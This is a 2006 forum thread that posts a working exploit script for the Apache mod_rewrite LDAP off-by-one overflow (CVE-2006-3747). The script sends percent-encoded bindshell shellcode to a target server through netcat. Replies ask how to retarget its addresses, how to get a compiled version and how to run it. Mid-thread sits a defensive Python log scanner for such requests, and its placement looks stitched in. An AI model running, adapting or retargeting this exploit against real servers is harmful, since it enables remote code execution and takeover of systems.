Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC. Discussion

Discussion in 'Security and Anonymity' started by melco, 25 Sep 2006.

  1. melco

    melco Member

    #!/bin/sh
    # Exploit for Apache mod_rewrite off-by-one.
    # Vulnerability discovered by Mark Dowd.
    # CVE-2006-3747
    #
    # by jack <jack\x40gulcas\x2Eorg>
    # 2006-08-20
    #
    # Thx to xuso for help me with the shellcode.
    #
    # I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
    # you must recalculate adressess.
    #
    # Shellcode is based on Taeho Oh bindshell on port 30464 and modified
    # for avoiding apache url-escape.. Take a look is quite nice ;)
    #
    # Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
    # 0x0834ae77 for any other version/system find it.
    #
    # Gulcas rulez :p

    echo -e "mod_rewrite apache off-by-one overflow"
    echo "by jack <jack\x40gulcas\x2eorg>\n\n"

    if [ $# -ne 1 ] ; then
    echo "Usage: $0 webserver"
    exit
    fi

    host=$1

    echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
    %31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
    %01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
    %31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
    %b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
    %c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
    %23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
    %08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
    %cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
    %77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
    Host: $host\r\n\r\n" | nc $host 80

    # milw0rm.com [2006-08-21]


    Explain how to pick the addresses for something other than "RewriteRule kung/(.*) $1" and for something other than "apache 1.3.34 (debian sarge)"? Purely technically, how?
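As an added, defensive example (not part of this thread or of the PoC), the following scans Apache access-log lines for requests shaped like the one above: an `ldap://` URL inside the request path whose percent-decoded form carries more than four `?` separators (the `%3F` bytes the PoC packs into the tail; a well-formed RFC 2255 LDAP URL uses at most four) or a run of non-printable bytes (the `%90` sled). The log lines, the thresholds and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (common log format); not taken from the thread.
SAMPLE_LOG = r'''
10.0.0.5 - - [21/Aug/2006:10:12:01 +0200] "GET /index.html HTTP/1.1" 200 1043
10.0.0.9 - - [21/Aug/2006:10:12:07 +0200] "GET /kung/ldap://localhost/%90%90%90%90%90%90%90%90%89%e6%31%c0%3FC%3FC%3FCCCCC%3FC%3F HTTP/1.1" 400 226
10.0.0.7 - - [21/Aug/2006:10:13:44 +0200] "GET /kung/ldap://ldap.example/dc=example?cn?sub?(uid=1) HTTP/1.1" 200 512
'''

# Pulls the request line out of a log entry: method, target and protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_ldap_rewrite(target: str, max_questions: int = 4, min_binary: int = 8) -> list:
    """Return the reasons a request target looks like a mod_rewrite LDAP off-by-one
    attempt, or an empty list. Thresholds are assumptions chosen for this example."""
    reasons = []
    idx = target.lower().find("ldap://")
    if idx < 0:
        return reasons
    # Decode %xx once, which is the form the rewrite engine works on after unescaping.
    raw = unquote_to_bytes(target[idx:])
    questions = raw.count(b"?")
    if questions > max_questions:
        reasons.append(f"{questions} '?' separators in LDAP URL (limit {max_questions})")
    binary = sum(1 for b in raw if b < 0x20 or b >= 0x7F)
    if binary >= min_binary:
        reasons.append(f"{binary} non-printable bytes after decoding")
    return reasons


def scan_log(text: str) -> list:
    """Return (target, reasons) pairs for every flagged request line in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = suspicious_ldap_rewrite(m.group("target"))
        if reasons:
            hits.append((m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(target, "->", "; ".join(reasons))
```

The benign third line (three `?` fields, printable DN and filter) passes, while only the percent-encoded request is reported.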
     
  2. fersa

    fersa New Member

    Does anyone have a compiled version? :)
     
  3. [loy]

    [loy] Elder

    // grab a Linux box and compile it
    or cygwin

    paste it into a file me_fuck.sh and then run bash (PATHTOFILE)me_fuck 127.0.0.1
     
  4. -Onotole-

    -Onotole- Elder

    I'm an archaeologist, help me with this sploit pls.. explain what's what... I'll give a + :)
     
  5. YuNi|[c

    YuNi|[c Elder

    I can't get it to run on cygwin,
    the response is No such file or directory :confused:
     
  6. Wiedzmin

    Wiedzmin New Member

    After running melco's exploit the server replies "Bad Request", Apache version 2.2.3. Is there nothing to be done about this?
    P.S. Sorry for the necroposting.
    P.P.S.
    Obviously you don't have netcat installed =)